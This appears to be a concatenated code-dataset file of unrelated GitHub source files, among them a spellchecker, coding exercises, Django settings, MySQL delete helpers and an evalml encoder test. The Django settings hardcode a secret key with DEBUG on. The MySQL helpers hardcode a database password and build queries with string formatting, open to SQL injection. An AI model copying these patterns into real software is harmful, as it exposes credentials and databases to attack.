root.mainloop()\r\n","repo_name":"Sid1125/LibraryManagementSystem","sub_path":"CS_Project/ViewBooks.py","file_name":"ViewBooks.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2050851307","text":"#!/usr/bin/python3.4\n# -*- coding: utf-8 -*-\n\nimport logging\nimport numpy\nfrom .dictionary import Dictionary\nfrom collections import defaultdict\nfrom difflib import ndiff\n\nlogging.basicConfig(\n format='%(levelname)s %(asctime)s : %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.DEBUG)\nlogger = logging.getLogger('spellchecker')\n\n\ndef ld(s, t):\n if s == \"\":\n return len(t)\n if t == \"\":\n return len(s)\n if s[-1] == t[-1]:\n cost = 0\n else:\n cost = 1\n\n res = min([ld(s[:-1], t) + 1,\n ld(s, t[:-1]) + 1,\n ld(s[:-1], t[:-1]) + cost])\n\n return res\n\n\ndef levenshtein_distance(str1, str2, ):\n counter = {\"+\": 0, \"-\": 0}\n distance = 0\n for edit_code, *_ in ndiff(str1, str2):\n if edit_code == \" \":\n distance += max(counter.values())\n counter = {\"+\": 0, \"-\": 0}\n else:\n counter[edit_code] += 1\n distance += max(counter.values())\n return distance\n\nclass Spellchecker:\n \"\"\" Класс спеллчекера.\n В нем реализованы функции поиска кандидатов исправлений для слов запроса.\n \"\"\"\n def __init__(self, arg):\n if isinstance(arg, str):\n self.dictionary = Dictionary(arg)\n elif isinstance(arg, Dictionary):\n self.dictionary = arg\n else:\n self.dictionary = Dictionary()\n\n self.soundex_index = self.build_soundex_index()\n\n def build_soundex_index(self):\n \"\"\"Строит индекс между кодами soundex и словами словаря.\n\n Для каждого слова из словаря строится код soundex и затем слово добавляется в список,\n соответсвующий этому коду.\n\n код soundex -> [слово1, слово2, ...]\n\n Возвращаемое значение:\n - Данный метод ничего не возвращает.\n \"\"\"\n index = defaultdict(list)\n for word, _ in self.dictionary.words.items():\n index[Dictionary.soundex(word)].append(word)\n\n return dict(index)\n\n @staticmethod\n def levenshtein_distance(word1, word2):\n \"\"\"Расстояние Левенштейна\n\n Рассчитывает расстояние Левенштейна между словами с операциями вставки, удаления и замены символов.\n Вес каждой операции равен 1.\n\n Параметры:\n - word1: первое слово\n - word2: второе слово\n\n Возвращаемое значение:\n - Расстояние между словами word1 и word2.\n \"\"\"\n # return ld(word1, word2)\n return levenshtein_distance(word1, word2)\n\n def is_correct(self, word):\n \"\"\"Слово есть в словаре\n\n Параметры:\n - word: слово для проверки\n\n Возвращаемое значение:\n - True если слово есть в словаре, иначе False\n \"\"\"\n return self.dictionary.get(word) != 0\n\n def get_candidates(self, word, max_distance=3):\n \"\"\"Поиск списка кандидатов для исправления слова\n\n Возвращает список кандидатов, отсортированных в порядке убывания частоты встречаемости слова �� корпусе.\n Таким образом, мы будем для исправления отдавать наиболее часто встречаемы словам в случае равных\n расстояний редактирования.\n\n В данном методе поиск кандидатов осуществляется перебором всех возможножных вариантов из словаря.\n\n Параметры:\n - word: слово для исправления\n - max_distance: опциональный параметр, задает допустимое максимальное число исправлений для кандидатов.\n\n Возвращаемое значение:\n - Список слов кандидатов с минимальным расстоянием редактирования, отсортированных в порядке убывания\n частоты в корпусе.\n \"\"\"\n\n candidates_thres = []\n min_distance_found = float(\"inf\")\n for candidate in self.dictionary.words:\n distance = self.levenshtein_distance(word, candidate)\n if distance > max_distance:\n continue\n if distance < min_distance_found:\n min_distance_found = distance\n candidates_thres = []\n elif distance > min_distance_found:\n continue\n candidates_thres.append(tuple([candidate, distance, self.dictionary.words[candidate]]))\n candidates_thres = sorted(candidates_thres,\n key=lambda x: tuple([x[1], -1*x[2]])\n )\n # logger.info(\"get_candidates: word={}, min_distance_found={}, candidates_thres={}\"\n # .format(word, min_distance_found, candidates_thres))\n candidates = [_[0] for _ in candidates_thres]\n\n return candidates\n\n def get_candidates_fast(self, word, max_distance=3):\n \"\"\"Быстрый поиск списка кандидатов для исправления слова\n\n Предыдущий метод работает очень долго - нужно посчитать расстояние между словом и всеми словами из словаря.\n Для того, чтобы сократить список слов для перебора мы будем считать расстояние только между словами,\n имеющими такой же код soundex как и у проверяемого слова.\n\n Параметры:\n - word: слово для исправления\n - max_distance: опциональный параметр, задает допустимое максимальное число исправлений для кандидатов.\n\n Возвращаемое значение:\n - Список слов кандидатов с минимальным расстоянием редактирования, отсортированных в порядке убывания\n частоты в корпусе.\n \"\"\"\n word_soundex = self.dictionary.soundex(word)\n if word_soundex not in self.dictionary.soundex_map:\n return []\n\n candidates_by_soundex = self.dictionary.soundex_map[word_soundex]\n # logger.info(\"get_candidates_fast: word={}, candidates_by_soundex={}\".format(word, candidates_by_soundex))\n\n candidates_thres = []\n min_distance_found = float(\"inf\")\n for candidate in candidates_by_soundex:\n distance = self.levenshtein_distance(word, candidate)\n if distance > max_distance:\n continue\n if distance < min_distance_found:\n min_distance_found = distance\n candidates_thres = []\n elif distance > min_distance_found:\n continue\n candidates_thres.append(tuple([candidate, distance, self.dictionary.words[candidate]]))\n candidates_thres = sorted(candidates_thres,\n key=lambda x: tuple([x[1], -1 * x[2]])\n )\n # logger.info(\"get_candidates: word={}, min_distance_found={}, candidates_thres={}\"\n # .format(word, min_distance_found, candidates_thres))\n candidates = [_[0] for _ in candidates_thres]\n\n return candidates\n\n","repo_name":"ladamalina/coursera-poisk","sub_path":"week-3__fuzzy_search/spellchecker/spellchecker.py","file_name":"spellchecker.py","file_ext":"py","file_size_in_byte":8167,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30100990307","text":"\"\"\"\r\nA **Harshad** number is a number which is divisible by the sum of its digits.\nFor example, 132 is divisible by 6 (1+3+2).\n\nA subset of the Harshad numbers are the **Moran** numbers. Moran numbers yield\na prime when divided by the sum of their digits. For example, 133 divided by 7\n(1+3+3) yields 19, a prime.\n\nCreate a function that takes a number and returns `\"M\"` if the number is a\nMoran number, `\"H\"` if it is a (non-Moran) Harshad number, or `\"Neither\"`.\n\n### Examples\n\n moran(132) ➞ \"H\"\n \n moran(133) ➞ \"M\"\n \n moran(134) ➞ \"Neither\"\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef isPrime(number):\n isAPrimeNumber = False\n for i in range(2, number): \n if (number % i) == 0: \n isAPrimeNumber = False \n break\n else: \n isAPrimeNumber = True\n return isAPrimeNumber\ndef moran(number):\n numberStr = str(number)\n sumOfDigits = 0\n for i in numberStr:\n sumOfDigits += int(i)\n if number % sumOfDigits == 0:\n if isPrime(int(number/sumOfDigits)) == True:\n return \"M\"\n else:\n return \"H\"\n else:\n return \"Neither\"\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"YTf8DZbTkzJ3kizNa_5.py","file_name":"YTf8DZbTkzJ3kizNa_5.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4965681417","text":"# -*- coding: utf-8 -*-\n\nimport threading\n\n_MAX_SEMAPHORE = 10\n\ndef call_api_with_multithread(api_method, target_lines):\n def worker(line, results, i, semaphore):\n with semaphore:\n results[i] = api_method(line)\n\n results = [(\"\", \"\")] * len(target_lines)\n s = threading.Semaphore(_MAX_SEMAPHORE)\n for i, line in enumerate(target_lines):\n if line:\n t = threading.Thread(target=worker, args=(line, results, i, s))\n t.start()\n # waiting for threads to complete\n main_thread = threading.currentThread()\n for t in threading.enumerate():\n if t is not main_thread:\n t.join()\n return results\n\ndef get_ip_address():\n import socket\n try:\n ip = socket.gethostbyname(socket.gethostname())\n except:\n ip = \"127.0.0.1\"\n return ip\n","repo_name":"t2y/ikazuchi","sub_path":"src/ikazuchi/core/translator/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73534760091","text":"#FILE: classMol.py\r\n#PURPOSE: This file contains the class Mol, which models a particular molecular species.\r\n\r\nclass Mol(object):\r\n#FUNCTION: __init__\r\n#PURPOSE: This function initializes the current Mol with given parameters.\r\n#INPUTS: energy = molecular bond breaking energy (K); mass = molecule mass (kg); xtot = xmolgr + xmolgas = total molecular fraction for molecule (over both grain and gas) of base nH; name = molecule chemical formula\r\n\tdef __init__(self, xtot, mass, energy, name):\r\n\t\t#Automatic attributes\r\n\t\tself.xtot = xtot\r\n\t\tself.mass = mass\r\n\t\tself.energy = energy\r\n\t\tself.name = name\r\n\t\tself.elements = self.getElements(name)\r\n\r\n\t\t\r\n#FUNCTION:\r\n#PURPOSE: This function is meant to take the chemical formula of a molecule and separate it into element components with counted frequencies.\r\n#EXAMPLE: 'H2O' would return the dictionary {'H':2, 'O':1}\r\n#INPUTS: name = molecular species's chemical formula as string\t\r\n\tdef getElements(self, name):\r\n\t\t#Below Section: Records the elements in molecule\r\n\t\telements = {}\r\n\t\telhere = name[0]\r\n\t\tdighere = ''\r\n\t\tfor a in range(0, len(name)):\r\n\t\t\t#Below handles if current letter in alphabet\r\n\t\t\tif name[a].isalpha():\r\n\t\t\t\t#If continued name of current element\r\n\t\t\t\tif name[a].islower():\r\n\t\t\t\t\telhere = elhere + name[a]\r\n\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t#Else if new element started\r\n\t\t\t\telif name[a].isupper() and a > 0:\r\n\t\t\t\t\t#If a repeated element within this molecule\r\n\t\t\t\t\tif elhere in elements:\r\n\t\t\t\t\t\tif dighere == '':\r\n\t\t\t\t\t\t\telements[elhere] = elements[elhere] + 1\r\n\t\t\t\t\t\telif dighere != '':\r\n\t\t\t\t\t\t\telements[elhere] = elements[elhere] + int(dighere)\r\n\t\t\t\t\t\r\n\t\t\t\t\t#If first time element added for molecule\r\n\t\t\t\t\telif dighere == '':\r\n\t\t\t\t\t\telements[elhere] = 1\r\n\t\t\t\t\telif dighere != '':\r\n\t\t\t\t\t\telements[elhere] = int(dighere)\r\n\t\t\t\t\t\r\n\t\t\t\t\t#Below resets elements\r\n\t\t\t\t\telhere = name[a]\r\n\t\t\t\t\tdighere = ''\r\n\t\t\t\t\t\r\n\t\t\t#Else if number encountered\r\n\t\t\telif name[a].isdigit():\r\n\t\t\t\tdighere = dighere + name[a]\r\n\t\t\t\t\t\r\n\t\t\t#Else if error encountered\r\n\t\t\telse:\r\n\t\t\t\traise ValueError(\"Weird molecular name encountered at \" + str(a) + \"th index: \" + name)\r\n\r\n\t\t\t#Below if end of name string reached\r\n\t\t\tif (a+1) >= len(name):\r\n\t\t\t\t#Records last element\r\n\t\t\t\t#If a repeated element within this molecule\r\n\t\t\t\tif elhere in elements:\r\n\t\t\t\t\tif dighere == '':\r\n\t\t\t\t\t\telements[elhere] = elements[elhere] + 1\r\n\t\t\t\t\telif dighere != '':\r\n\t\t\t\t\t\telements[elhere] = elements[elhere] + int(dighere)\r\n\t\t\t\t\r\n\t\t\t\t#If first time element added for molecule\r\n\t\t\t\telif dighere == '':\r\n\t\t\t\t\telements[elhere] = 1\r\n\t\t\t\telif dighere != '':\r\n\t\t\t\t\telements[elhere] = int(dighere)\r\n\t\t\t\r\n\t\t#Below attributes the recorded elements\r\n\t\treturn elements\r\n\r\n\r\n#FUNCTION: __str__\r\n#PURPOSE: This function is meant to specify what occurs when attempting to print an object Mol.\r\n\tdef __str__(self):\r\n\t\t#Below generates strings of information to print\r\n\t\tstrname = 'Molecule: ' + self.name + '\\n'\r\n\t\tstrels = 'Elements: ' + str(self.elements) + '\\n'\r\n\t\tstrmass = 'Mass (kg): {:.2e} \\n'.format(self.mass)\r\n\t\tstrenergy = 'Energy (K): {:.2f} \\n'.format(self.energy)\r\n\t\tstrxtot = 'Molecular Fraction of Total nH: {:.2e} \\n'.format(self.xtot)\r\n\t\t\r\n\t\t#Below puts together string of information\r\n\t\tdone = (strname + strels + strmass + strenergy + strxtot)\r\n\t\t\t\t\r\n\t\t#Below returns string to print\r\n\t\treturn done\r\n\r\n\t\t","repo_name":"apiso/Thesis","sub_path":"_Jamila/classMol.py","file_name":"classMol.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43208243959","text":"vowels_set = {'a','e','i','o','u'}\n\ndef check_vowel(str):\n set_str = set(str.lower())\n new_set = set()\n for i in set_str:\n if(i in vowels_set):\n new_set.add(i)\n if(len(new_set) == len(vowels_set)):\n return \"Accepted\"\n else:\n return \"Not accepted\" \n \ndef alternate(str):\n set_str = set(str.lower())\n intersection_set = set_str.intersection(vowels_set)\n if(len(intersection_set) == len(vowels_set)):\n return \"Accepted\"\n return \"Not accepted\"\n \n \nprint(check_vowel(\"geeksforgeeks\"))\nprint(check_vowel(\"ABeeIghiObhkUul\"))\n\nprint(alternate(\"geeksforgeeks\"))\nprint(alternate(\"ABeeIghiObhkUul\"))\n","repo_name":"dstrivedi/Python-Problems","sub_path":"Sets/strVowels.py","file_name":"strVowels.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72950036571","text":"import numpy as np\n\nT = int(input())\n\nfor x in range(T):\n\n string = str(input())\n res = \"\"\n\n for i in range(len(string)):\n\n # first number\n if i == 0:\n for j in range(int(string[i])):\n res += \"(\"\n\n # last number\n if i == len(string)-1:\n res += string[i]\n for j in range(int(string[i])):\n res += \")\"\n \n # any other number\n if i != len(string)-1:\n current = int(string[i])\n next = int(string[i+1])\n\n res += string[i]\n\n if current > next:\n n = current-next\n for j in range(n):\n res += \")\"\n\n if next > current:\n n = next-current\n for j in range(n):\n res += \"(\"\n \n \n print(\"Case #\"+ str(x+1) +\":\", res)\n\n\n\n","repo_name":"lucaspec/CodeJam","sub_path":"Training1/nestingdepth.py","file_name":"nestingdepth.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27394277435","text":"\nfrom pathlib import Path\nfrom datetime import timedelta\nimport os\n\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\nBASE_DIR = Path(__file__).resolve().parent.parent\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'django-insecure-cy^ces4t@3b=@nz7097c-b*d9av^(lwgf-t6o6%3l)zm$1-skw'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = [\n \n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n #'django.contrib.postgres',\n\n # third party\n 'rest_framework',\n 'rest_framework_simplejwt.token_blacklist',\n 'django_seed',\n 'corsheaders',\n \n # our apps\n\n \n 'users', \n 'store',\n\n\n]\n\nAUTH_USER_MODEL = 'users.NewUser'\n\nMIDDLEWARE = [\n 'corsheaders.middleware.CorsMiddleware', \n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n #'debug_toolbar.middleware.DebugToolbarMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\nif DEBUG:\n MIDDLEWARE += [\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\n ]\n INSTALLED_APPS += [\n 'debug_toolbar',\n ]\n INTERNAL_IPS = ['127.0.0.1', ]\n\nimport mimetypes\nmimetypes.add_type(\"application/javascript\", \".js\", True)\n\nDEBUG_TOOLBAR_CONFIG = {\n 'INTERCEPT_REDIRECTS': False,\n}\n\nROOT_URLCONF = 'salon.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [BASE_DIR / 'templates'],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'salon.wsgi.application'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': BASE_DIR / 'db.sqlite3',\n }\n}\n\n\n# DATABASES = {\n# 'default': {\n# 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n# 'NAME': 'salon_db',\n# 'USER': 'postgres',\n# 'PASSWORD': os.environ.get('POSTGRES_PASSWORD'),\n# 'HOST': '127.0.0.1',\n# 'PORT': '5432',\n# }\n# }\n\n# Password validation\n# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.2/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/3.2/howto/static-files/\n\n\n# Default primary key field type\n# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field\n\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n\nSTATIC_URL = '/static/'\nMEDIA_URL = '/images/'\n\nSTATICFILES_DIRS = [\n BASE_DIR / 'static',\n BASE_DIR / 'frontend/build/static'\n]\n\nMEDIA_ROOT = BASE_DIR / 'static/images'\nSTATIC_ROOT = BASE_DIR / 'staticfiles'\n\nREST_FRAMEWORK = {\n # project level permissions\n 'DEFAULT_PERMISSION_CLASSES': (\n # IsAuthenticatedOrReadOnly may bring problems when trying to login or register new user \n 'rest_framework.permissions.AllowAny',\n ),\n\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n\n 'rest_framework_simplejwt.authentication.JWTAuthentication',\n ),\n\n 'DEFAULT_SCHEMA_CLASS': 'rest_framework.schemas.coreapi.AutoSchema'\n\n}\n\n'''\n jwt settings\n'''\n\nSIMPLE_JWT = {\n 'ACCESS_TOKEN_LIFETIME': timedelta(minutes=10000),\n 'REFRESH_TOKEN_LIFETIME': timedelta(days=1),\n 'ROTATE_REFRESH_TOKENS': True,\n 'BLACKLIST_AFTER_ROTATION': True,\n 'UPDATE_LAST_LOGIN': False,\n\n 'ALGORITHM': 'HS256',\n 'SIGNING_KEY': SECRET_KEY,\n 'VERIFYING_KEY': None,\n 'AUDIENCE': None,\n 'ISSUER': None,\n\n 'AUTH_HEADER_TYPES': ('Bearer', 'JWT'),\n 'AUTH_HEADER_NAME': 'HTTP_AUTHORIZATION',\n 'USER_ID_FIELD': 'id',\n 'USER_ID_CLAIM': 'user_id',\n\n 'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),\n 'TOKEN_TYPE_CLAIM': 'token_type',\n\n 'JTI_CLAIM': 'jti',\n\n 'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',\n 'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),\n 'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),\n}\n\n\nCORS_ALLOW_ALL_ORIGINS = True \n\n# CORS_ALLOW_METHODS = [\n# 'DELETE',\n# 'GET',\n# 'OPTIONS',\n# 'PATCH',\n# 'POST',\n# 'PUT',\n# ]\n\n# CORS_ALLOW_HEADERS = [\n# 'accept',\n# 'accept-encoding',\n# 'authorization',\n# 'content-type',\n# 'dnt',\n# 'origin',\n# 'user-agent',\n# 'x-csrftoken',\n# 'x-requested-with',\n# ]","repo_name":"MutwiriFrank/django_react_eccommerce","sub_path":"salon/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69986955613","text":"import collections\n\nclass StringBuffer(object):\n 'Buffer manager with great worst-case behavior'\n \n def __init__(self, data=''):\n self.buf = collections.deque([data])\n self.buf_len = len(data)\n self.pos = 0\n \n def __len__(self):\n return self.buf_len - self.pos\n \n def add(self, data):\n self.buf.append(data)\n self.buf_len += len(data)\n \n def get(self, wants):\n if self.buf_len - self.pos < wants:\n raise IndexError('not enough data')\n data = []\n while wants:\n seg = self.buf[0][self.pos:self.pos+wants]\n self.pos += len(seg)\n while self.buf and self.pos >= len(self.buf[0]):\n x = self.buf.popleft()\n self.buf_len -= len(x)\n self.pos -= len(x)\n \n data.append(seg)\n wants -= len(seg)\n return ''.join(data)\n\ndef _DataChunker(receiver):\n wants = receiver.next()\n buf = StringBuffer()\n \n while True:\n if len(buf) >= wants:\n wants = receiver.send(buf.get(wants))\n else:\n buf.add((yield))\ndef DataChunker(receiver):\n '''\n Produces a function that accepts data that is input into a generator\n (receiver) in response to the receiver yielding the size of data to wait on\n '''\n x = _DataChunker(receiver)\n x.next()\n return x.send\n","repo_name":"p2pool/p2pool","sub_path":"p2pool/util/datachunker.py","file_name":"datachunker.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":1095,"dataset":"github-code","pt":"32"} +{"seq_id":"4142458119","text":"def numcomplement(num):\n num=format(num,\"b\")\n print(num)\n complement=\"\"\n com=str(num)\n for alpha in com:\n if alpha==\"0\":\n complement+=\"1\"\n else:\n complement+=\"0\"\n print(complement)\n print(int(complement,2))\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n# class Solution:\n# def addTwoNumbers(self, l1, l2):\n\n\ndef addnum(l1,l2):\n print(l1)\n add=1\n sum1=0\n sum2=0\n for elem in l1:\n sum1+=elem*add\n add=add*10\n add=1\n for elem in l2:\n sum2+=elem*add\n add=add*10\n print(sum1)\n print(sum2)\n print(sum1+sum2)\n\ndef longestpaln(word):\n start=0\n end=0\n palindrome=\"\"\n check=\"\"\n for i in range(len(word)):\n check+=word[i]\n if isPalin(check):\n if len(check)>len(palindrome):\n palindrome=check\n\ndef isPalin(word):\n end=-1\n for i in range(len(word)):\n print(word[i], word[end])\n if i>=len(word)//2:\n return True\n if word[i]!=word[end]:\n print(word[i],word[end])\n return False\n end-=-1\n\n\n\n\n\nif __name__ == '__main__':\n # numcomplement(5)\n # l1 = [2, 4, 3]\n # l2 = [5, 6, 4]\n # addnum(l1,l2)\n longestpaln(\"babad\")\n","repo_name":"sookmun/Advent_Of_Code_2021","sub_path":"practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31094942708","text":"from .base import BaseCommand\n\n\nclass PercolateCommand(BaseCommand):\n command_name = \"elasticsearch:percolate\"\n\n def run_request(self):\n options = dict(\n index=self.settings.index,\n doc_type=self.settings.doc_type,\n body=self.get_text()\n )\n return self.client.percolate(**options)\n","repo_name":"KunihikoKido/sublime-elasticsearch-client","sub_path":"commands/percolate.py","file_name":"percolate.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"32"} +{"seq_id":"12966268836","text":"import mysql.connector\n\ndef delete_from_elemental():\n element1 = raw_input(\"Element 1 is? \")\n element2 = raw_input(\"Element 2 is? \")\n try:\n mydb = mysql.connector.connect(\n host='localhost',\n user='lordn2',\n password='May301999',\n database='lordn2_db',\n unix_socket='/var/lib/mysql/mysql.sock'\n )\n cursor = mydb.cursor()\n delete_elemental_interaction = (\"DELETE FROM Elemental_Interactions \"\n \"WHERE (element1 = %s AND element2 = %s)\")\n data_elemental = (element1, element2)\n cursor.execute(delete_elemental_interaction, data_elemental)\n mydb.commit()\n \n except mysql.connector.Error as error:\n print(error)\n finally:\n if mydb.is_connected():\n cursor.close()\n mydb.close()\n \ndef delete_from_enemy():\n name = raw_input(\"Name is? \")\n delete_from_intermediary(\"Enemy_Rewards\", \"Enemys\", name)\n try:\n mydb = mysql.connector.connect(\n host='localhost',\n user='lordn2',\n password='May301999',\n database='lordn2_db',\n unix_socket='/var/lib/mysql/mysql.sock'\n )\n cursor = mydb.cursor()\n delete_enemy = (\"DELETE FROM Enemies \"\n \"WHERE name = %s\")\n data_enemy = (name)\n cursor.execute(delete_enemy, data_enemy)\n mydb.commit()\n \n except mysql.connector.Error as error:\n print(error)\n finally:\n if mydb.is_connected():\n cursor.close()\n mydb.close()\n \ndef delete_from_elite():\n name = raw_input(\"Name is? \")\n delete_from_intermediary(\"Elite_Rewards\", \"Elites\", name)\n try:\n mydb = mysql.connector.connect(\n host='localhost',\n user='lordn2',\n password='May301999',\n database='lordn2_db',\n unix_socket='/var/lib/mysql/mysql.sock'\n )\n cursor = mydb.cursor()\n delete_elite = (\"DELETE FROM Elites \"\n \"WHERE name = %s\")\n data_elite = (name)\n cursor.execute(delete_elite, data_elite)\n mydb.commit()\n \n except mysql.connector.Error as error:\n print(error)\n finally:\n if mydb.is_connected():\n cursor.close()\n mydb.close()\n \ndef delete_from_characters():\n name = raw_input(\"Name is? \")\n delete_from_intermediary(\"Character_Rewards\", \"Characters\", name)\n try:\n mydb = mysql.connector.connect(\n host='localhost',\n user='lordn2',\n password='May301999',\n database='lordn2_db',\n unix_socket='/var/lib/mysql/mysql.sock'\n )\n cursor = mydb.cursor()\n delete_character = (\"DELETE FROM Characters \"\n \"WHERE name = %s\")\n data_character = (name)\n cursor.execute(delete_charater, data_character)\n mydb.commit()\n \n except mysql.connector.Error as error:\n print(error)\n finally:\n if mydb.is_connected():\n cursor.close()\n mydb.close()\n \ndef delete_from_domain():\n name = raw_input(\"Name is? \")\n delete_from_intermediary(\"Domain_Rewards\", \"Domains\", name)\n try:\n mydb = mysql.connector.connect(\n host='localhost',\n user='lordn2',\n password='May301999',\n database='lordn2_db',\n unix_socket='/var/lib/mysql/mysql.sock'\n )\n cursor = mydb.cursor()\n delete_domain = (\"DELETE FROM Domains \"\n \"WHERE name = %s\")\n data_domain = (name)\n cursor.execute(delete_domain, data_domain)\n mydb.commit()\n \n except mysql.connector.Error as error:\n print(error)\n finally:\n if mydb.is_connected():\n cursor.close()\n mydb.close()\n \ndef delete_from_rewards():\n name = raw_input(\"Name is? \")\n delete_from_intermediary(\"Character_Rewards\", \"Rewards\", name)\n delete_from_intermediary(\"Elite_Rewards\", \"Rewards\", name)\n delete_from_intermediary(\"Domain_Rewards\", \"Rewards\", name)\n delete_from_intermediary(\"Enemy_Rewards\", \"Rewards\", name)\n try:\n mydb = mysql.connector.connect(\n host='localhost',\n user='lordn2',\n password='May301999',\n database='lordn2_db',\n unix_socket='/var/lib/mysql/mysql.sock'\n )\n cursor = mydb.cursor()\n delete_reward = (\"DELETE FROM Rewards \"\n \"WHERE name = %s\")\n data_reward = (name,)\n cursor.execute(delete_reward, data_reward)\n mydb.commit()\n \n except mysql.connector.Error as error:\n print(error)\n finally:\n if mydb.is_connected():\n cursor.close()\n mydb.close()\n \ndef delete_from_intermediary(targetTableName, sourceTableName, itemName):\n try:\n mydb = mysql.connector.connect(\n host='localhost',\n user='lordn2',\n password='May301999',\n database='lordn2_db',\n unix_socket='/var/lib/mysql/mysql.sock'\n )\n cursor = mydb.cursor()\n if sourceTableName == \"Rewards\":\n cursor.execute(\"\"\"DELETE FROM {} WHERE reward_id = \n (SELECT reward_id FROM Rewards\n WHERE name = \"{}\");\"\"\".format(targetTableName, itemName))\n else:\n cursor.execute(\"\"\"DELETE FROM {} WHERE {}_id = \n (SELECT {}_id FROM {}\n WHERE name = \"{}\");\"\"\".format(targetTableName, (sourceTableName.lower())[:-1], (sourceTableName.lower())[:-1], sourceTableName, itemName))\n mydb.commit()\n \n except mysql.connector.Error as error:\n print(error)\n finally:\n if mydb.is_connected():\n cursor.close()\n mydb.close()","repo_name":"lordn54/Genshin-Impact-DB","sub_path":"deleteFromDatabase.py","file_name":"deleteFromDatabase.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11522066839","text":"from unittest.mock import patch\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nimport woodwork as ww\nfrom pandas.testing import assert_frame_equal\nfrom woodwork.logical_types import (\n Boolean,\n Categorical,\n Datetime,\n Double,\n Integer,\n NaturalLanguage,\n)\n\nfrom evalml.exceptions import ComponentNotYetFittedError\nfrom evalml.pipelines.components import TargetEncoder\n\n\ndef test_init():\n parameters = {\n \"cols\": None,\n \"smoothing\": 1.0,\n \"handle_unknown\": \"value\",\n \"handle_missing\": \"value\",\n }\n encoder = TargetEncoder()\n assert encoder.parameters == parameters\n\n\ndef test_parameters():\n encoder = TargetEncoder(cols=[\"a\"])\n expected_parameters = {\n \"cols\": [\"a\"],\n \"smoothing\": 1.0,\n \"handle_unknown\": \"value\",\n \"handle_missing\": \"value\",\n }\n assert encoder.parameters == expected_parameters\n\n\ndef test_categories():\n encoder = TargetEncoder()\n with pytest.raises(AttributeError, match=\"'TargetEncoder' object has no 